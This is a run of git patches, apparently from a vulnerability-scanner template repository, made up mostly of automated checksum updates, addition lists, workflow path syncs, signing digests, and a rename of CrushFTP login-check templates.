b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:e72fb91b5adc5da27531f0e0b5cb2b5f20a27465 -cves.json-checksum.txt:ed4104bf38fb14d9b7118a910e28f2d908757626 +cves.json:093496181a54e1ca8a72dc3e80f1a16d953eba11 +cves.json-checksum.txt:82d1c1b8bbfab0b5f72989fb3c58fe16109c7de3 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -2907,6 +2907,7 @@ http/cves/2023/CVE-2023-1780.yaml:34a036d95931c6b53e0cdbbe5524814efebac2c9 http/cves/2023/CVE-2023-1835.yaml:0a952460cce5463c54ae68fca72f4c1bec74ec54 http/cves/2023/CVE-2023-1880.yaml:254a4b78665d1b33b264997a8b496cb33fcc376e http/cves/2023/CVE-2023-1890.yaml:36d627ec07a4728f8df5debe01f9dcefe52c90cf +http/cves/2023/CVE-2023-1892.yaml:a43c8d52983d56c8cac91624f6afaf8ca39fa773 http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 @@ -3218,6 +3219,7 @@ http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0 http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c +http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af @@ -3249,7 +3251,7 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 -http/cves/2024/CVE-2024-32399.yaml:6dce2f1a1371d573691ea9bf419aeb954003ee81 +http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -8445,7 +8447,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a8cf75aee0b6983bac40a13b91fef7196ac46814 +templates-checksum.txt:869fa23f76070ba5e7592652a8928a18b96f79f5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b71d988e71e4cccc45aad286a246344c2e8d02b5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Apr 2024 11:56:38 +0000 Subject: [PATCH 0369/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9b9f883d9e..17299dcaa3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-1892.yaml' - 'http/cves/2023/CVE-2023-2948.yaml' - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' From 99b04df2a8ae2b869049a8e57e2accc3618695a9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Apr 2024 11:57:46 +0000 Subject: [PATCH 0370/1768] Auto Template Signing [Thu Apr 25 11:57:46 UTC 2024] :robot: --- http/cves/2023/CVE-2023-1892.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index e431560e85..3f5115caac 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -62,3 +62,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220709cb3b14207ada2e026411d050b57c58e1f48f91202bb50481bf3ba342b32bf022016e81e67e363424bb053a774a26a9f93bc8f50bbb22ef7fc04d365e716c763ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9842ce2e36eb29bf7e9b4655cfbca94891fbfe52 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 26 Apr 2024 14:06:39 +0530 Subject: [PATCH 0371/1768] Update and rename http/default-logins/crushftp-anonymous-login.yaml to http/default-logins/crushftp/crushftp-anonymous-login.yaml --- .../default-logins/{ => crushftp}/crushftp-anonymous-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/default-logins/{ => crushftp}/crushftp-anonymous-login.yaml (95%) diff --git a/http/default-logins/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml similarity index 95% rename from http/default-logins/crushftp-anonymous-login.yaml rename to http/default-logins/crushftp/crushftp-anonymous-login.yaml index 8d437659b5..8491b4684c 100644 --- a/http/default-logins/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -10,7 +10,7 @@ info: shodan-query: html:"CrushFTP" verified: true max-request: 2 - tags: misconfig,anonymous,crushftp + tags: default-logins,anonymous,crushftp http: - raw: From cf8fc1d2090a38c87cec0f0a49b7286855809507 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:40:21 +0000 Subject: [PATCH 0372/1768] Auto Generated New Template Addition List [Fri Apr 26 08:40:21 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e134fb58ef..ccf7ab207a 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-32399.yaml +http/default-logins/crushftp/crushftp-anonymous-login.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml From bc45d54d2e8f9faba21b0e6194449473fa17ea98 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 26 Apr 2024 14:10:28 +0530 Subject: [PATCH 0373/1768] Update and rename http/default-logins/crushftp-default-login.yaml to http/default-logins/crushftp/crushftp-default-login.yaml --- http/default-logins/{ => crushftp}/crushftp-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/default-logins/{ => crushftp}/crushftp-default-login.yaml (100%) diff --git a/http/default-logins/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml similarity index 100% rename from http/default-logins/crushftp-default-login.yaml rename to http/default-logins/crushftp/crushftp-default-login.yaml From 2821978e066294cdaba3da924bb58c0da7c6f4b0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 08:40:31 +0000 Subject: [PATCH 0374/1768] Auto Generated Templates Checksum [Fri Apr 26 08:40:31 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dd338b7b03..4b5f1b2ce9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2907,7 +2907,7 @@ http/cves/2023/CVE-2023-1780.yaml:34a036d95931c6b53e0cdbbe5524814efebac2c9 http/cves/2023/CVE-2023-1835.yaml:0a952460cce5463c54ae68fca72f4c1bec74ec54 http/cves/2023/CVE-2023-1880.yaml:254a4b78665d1b33b264997a8b496cb33fcc376e http/cves/2023/CVE-2023-1890.yaml:36d627ec07a4728f8df5debe01f9dcefe52c90cf -http/cves/2023/CVE-2023-1892.yaml:a43c8d52983d56c8cac91624f6afaf8ca39fa773 +http/cves/2023/CVE-2023-1892.yaml:cf100b4cee239124a45c620eabe4e227c72cd62b http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 @@ -3292,6 +3292,7 @@ http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 +http/default-logins/crushftp/crushftp-anonymous-login.yaml:3cb510fdbf43598e18f42b3d7727fbbc9b04964f http/default-logins/d-link/dlink-centralized-default-login.yaml:144088e9a738b069bd642d60d64993447e44f264 http/default-logins/dataease/dataease-default-login.yaml:b0bd13ca24f63ec494c00e52233168059a5c0b75 http/default-logins/datahub/datahub-metadata-default-login.yaml:75c046c42ef30be2401e7d782f6933e71084bfab @@ -8447,7 +8448,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:869fa23f76070ba5e7592652a8928a18b96f79f5 +templates-checksum.txt:04dfec6762163a084b0bac1799b31cac0cd90d02 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c2576dc8bf67afd2f6db52f90a07360c49f1ef07 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:41:01 +0000 Subject: [PATCH 0375/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 17299dcaa3..74226f699e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' + - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' From c3c363b0969e9229bdee72ea97e1781f9fbb4d46 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 08:42:17 +0000 Subject: [PATCH 0376/1768] Auto Template Signing [Fri Apr 26 08:42:17 UTC 2024] :robot: --- http/default-logins/crushftp/crushftp-anonymous-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index 8491b4684c..e768a596a1 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -47,3 +47,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' +# digest: 490a00463044022047ed09e7cce78c6ef3d5812fd4d9f0c9b9325f82c20c0eeaaa4b280b7853ec810220750d2e91ea2a302be6eebf420b4dee340c13ff61593ff73ac8ba9db2582b68cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 92d2d9226f5ff7c071476e5409d17e06c7353273 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:45:52 +0000 Subject: [PATCH 0377/1768] Auto Generated New Template Addition List [Fri Apr 26 08:45:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ccf7ab207a..549dee9ba9 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-32399.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml +http/default-logins/crushftp/crushftp-default-login.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml From c88d65d35c6dffa31d4f52f471411a3e45cace48 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:46:32 +0000 Subject: [PATCH 0378/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 74226f699e..097e3ca0d1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' + - 'http/default-logins/crushftp/crushftp-default-login.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' From 3c7a8176bc6b9987e46baa29ea5ae6ba39a163ab Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 08:47:44 +0000 Subject: [PATCH 0379/1768] Auto Generated Templates Checksum [Fri Apr 26 08:47:44 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4b5f1b2ce9..9779f24296 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3292,7 +3292,8 @@ http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 -http/default-logins/crushftp/crushftp-anonymous-login.yaml:3cb510fdbf43598e18f42b3d7727fbbc9b04964f +http/default-logins/crushftp/crushftp-anonymous-login.yaml:a6d2f07b7d1cf46d5d6bcdaff367a7b12ef99aed +http/default-logins/crushftp/crushftp-default-login.yaml:18ec5ee08c96cb9bc3921978df9029a63534a4bd http/default-logins/d-link/dlink-centralized-default-login.yaml:144088e9a738b069bd642d60d64993447e44f264 http/default-logins/dataease/dataease-default-login.yaml:b0bd13ca24f63ec494c00e52233168059a5c0b75 http/default-logins/datahub/datahub-metadata-default-login.yaml:75c046c42ef30be2401e7d782f6933e71084bfab @@ -4017,6 +4018,7 @@ http/exposed-panels/mobileiron-sentry.yaml:758f0250a4d05db4ea0b55ef09cee2f613f48 http/exposed-panels/modoboa-panel.yaml:dc1119a48b640577160e90dea784d9942d48dece http/exposed-panels/mongodb-ops-manager.yaml:93d1b7adf65fc1472b0c9e7e4bb9850437808a42 http/exposed-panels/monitorix-exposure.yaml:f9891feabc80074870d3bdab2f63a97e609d2e0c +http/exposed-panels/monitorr-panel.yaml:20798c7938b41296f3d6a2d0792d700d886a961c http/exposed-panels/monstra-admin-panel.yaml:0a09348d2715473f4f8979948db45bbc52b49793 http/exposed-panels/moodle-workplace-panel.yaml:50150a265d42af27a0a39a8d973235b509dc095d http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed96bb9 @@ -8448,7 +8450,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:04dfec6762163a084b0bac1799b31cac0cd90d02 +templates-checksum.txt:171ad71ad4b638f339068cef9738e37907390576 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d44b80b4bd18e3003c4b57951c689825bf98eb44 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 08:49:21 +0000 Subject: [PATCH 0380/1768] Auto Template Signing [Fri Apr 26 08:49:21 UTC 2024] :robot: --- http/default-logins/crushftp/crushftp-default-login.yaml | 1 + http/exposed-panels/monitorr-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index 8ff9b87fcf..4528994223 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -56,3 +56,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' +# digest: 490a00463044022077f7dbd7c50db82f80d82e6ee234480f22902da10583351bd3a36193999e5d08022024b534bb71d7933f1bdc11a7cda6962359609655e1df2e567be4f77eecf8fc65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml index 804aa91704..824c38fc0f 100644 --- a/http/exposed-panels/monitorr-panel.yaml +++ b/http/exposed-panels/monitorr-panel.yaml @@ -22,3 +22,4 @@ http: - 'status_code == 200' - 'contains_any(body, "content=\"Monitorr", "Monitorr is loading", "title=\"Monitorr Settings")' condition: and +# digest: 4a0a00473045022043d99216d05ce35b6327da8e17578a7b6a293d400a3854c537799159f3312949022100b92e70aef09759c0a795748b4ad1c6e564f39d44a95ea606eff2378672c72595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7f3c5bc053754213ceaea7b6bcee68bedc14d9ca Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:53:27 +0000 Subject: [PATCH 0381/1768] Auto Generated New Template Addition List [Fri Apr 26 08:53:27 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 549dee9ba9..5b6e3f02e6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2023/CVE-2023-1892.yaml +http/cves/2023/CVE-2023-2227.yaml http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml @@ -12,6 +13,7 @@ http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml http/exposed-panels/femtocell-panel.yaml +http/exposed-panels/monitorr-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml From e09fbc805958cd596b7970eb5eef8dfc1c95f6d4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 08:53:36 +0000 Subject: [PATCH 0382/1768] Auto Generated Templates Checksum [Fri Apr 26 08:53:36 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9779f24296..1ab3f73b34 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2921,6 +2921,7 @@ http/cves/2023/CVE-2023-2130.yaml:3112dc19046f9cd9a37c8248f8dd4993a2785ea3 http/cves/2023/CVE-2023-2178.yaml:1c0e5bdc28786bbf38e0dab3801f5ed0f7d57d80 http/cves/2023/CVE-2023-22232.yaml:7a054b7c8eb7e2a0e5ea214bddba72a25b1812d6 http/cves/2023/CVE-2023-2224.yaml:52adda04d740bd4bfdce198531080707a6914193 +http/cves/2023/CVE-2023-2227.yaml:ba7c9dba9df328c0200959c7c76ce91cc143fa9e http/cves/2023/CVE-2023-22432.yaml:d50bb3793ea5aa8783f5fb80f2f8b341f44818b5 http/cves/2023/CVE-2023-22463.yaml:211e5de7967e175e73daf8d08a733140f2488fed http/cves/2023/CVE-2023-22478.yaml:a65b40c02a4506378bee485814f98c19b9ac1aa0 @@ -3293,7 +3294,7 @@ http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21 http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 http/default-logins/crushftp/crushftp-anonymous-login.yaml:a6d2f07b7d1cf46d5d6bcdaff367a7b12ef99aed -http/default-logins/crushftp/crushftp-default-login.yaml:18ec5ee08c96cb9bc3921978df9029a63534a4bd +http/default-logins/crushftp/crushftp-default-login.yaml:51a1603c2838c8237672659ffd177f959a70a599 http/default-logins/d-link/dlink-centralized-default-login.yaml:144088e9a738b069bd642d60d64993447e44f264 http/default-logins/dataease/dataease-default-login.yaml:b0bd13ca24f63ec494c00e52233168059a5c0b75 http/default-logins/datahub/datahub-metadata-default-login.yaml:75c046c42ef30be2401e7d782f6933e71084bfab @@ -4018,7 +4019,7 @@ http/exposed-panels/mobileiron-sentry.yaml:758f0250a4d05db4ea0b55ef09cee2f613f48 http/exposed-panels/modoboa-panel.yaml:dc1119a48b640577160e90dea784d9942d48dece http/exposed-panels/mongodb-ops-manager.yaml:93d1b7adf65fc1472b0c9e7e4bb9850437808a42 http/exposed-panels/monitorix-exposure.yaml:f9891feabc80074870d3bdab2f63a97e609d2e0c -http/exposed-panels/monitorr-panel.yaml:20798c7938b41296f3d6a2d0792d700d886a961c +http/exposed-panels/monitorr-panel.yaml:be76851062e5fcf5dc9f60f31eaac23695302356 http/exposed-panels/monstra-admin-panel.yaml:0a09348d2715473f4f8979948db45bbc52b49793 http/exposed-panels/moodle-workplace-panel.yaml:50150a265d42af27a0a39a8d973235b509dc095d http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed96bb9 @@ -8450,7 +8451,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:171ad71ad4b638f339068cef9738e37907390576 +templates-checksum.txt:156a6e15576d7cb50a4acef7eab8e73b11832c62 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From afd30cb6a137c9892b064f4b4e3cf126b79a136b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 26 Apr 2024 14:24:04 +0530 Subject: [PATCH 0383/1768] minor format update --- network/detection/bluecoat-telnet-proxy-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/bluecoat-telnet-proxy-detect.yaml b/network/detection/bluecoat-telnet-proxy-detect.yaml index 3e1128b63f..1c9fbfb131 100644 --- a/network/detection/bluecoat-telnet-proxy-detect.yaml +++ b/network/detection/bluecoat-telnet-proxy-detect.yaml @@ -4,7 +4,8 @@ info: name: BlueCoat Telnet Proxy - Detect author: righettod severity: info - description: Detects Blue Coat telnet proxy services. + description: | + Detects Blue Coat telnet proxy services. reference: - https://en.wikipedia.org/wiki/Blue_Coat_Systems - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3/about-ssl-proxy.html From dbfb390c305f3368e63d101173951e897b3a5326 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:54:05 +0000 Subject: [PATCH 0384/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 097e3ca0d1..b2f4820068 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2023/CVE-2023-1892.yaml' + - 'http/cves/2023/CVE-2023-2227.yaml' - 'http/cves/2023/CVE-2023-2948.yaml' - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' @@ -17,6 +18,7 @@ on: - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' - 'http/exposed-panels/femtocell-panel.yaml' + - 'http/exposed-panels/monitorr-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' From e4b6c2ec4dd4b00bfccc3519fa266cad7e1957e5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 08:55:21 +0000 Subject: [PATCH 0385/1768] Auto Template Signing [Fri Apr 26 08:55:21 UTC 2024] :robot: --- http/cves/2023/CVE-2023-2227.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index 9478996811..827e860014 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -48,3 +48,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402204ab95cad35e5dc938efd7d6b61c067c225b1b5db05ba420a90b83c3e944f7e43022044d08dd4379dc38acdb9b5a5aeb2cffcd30d0a608aea1c9e622135c2f087db39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bfc4332dae60b8c09055a4ee1232f7526f13ccc2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 26 Apr 2024 14:25:28 +0530 Subject: [PATCH 0386/1768] Update aix-websm-detect.yaml --- network/detection/aix-websm-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml index a9292abd05..4f30cd7dc6 100644 --- a/network/detection/aix-websm-detect.yaml +++ b/network/detection/aix-websm-detect.yaml @@ -4,7 +4,8 @@ info: name: AIX WebSM - Detect author: righettod severity: info - description: Detects IBM AIX Web-based System Manager services. + description: | + Detects IBM AIX Web-based System Manager services. reference: - https://en.wikipedia.org/wiki/IBM_Web-based_System_Manager - https://www.filibeto.org/unix/aix/lib/rel/5.2/wsmadmn.pdf From 36be8133e92d6fba05464ac35fe83b4927029fc9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 08:59:57 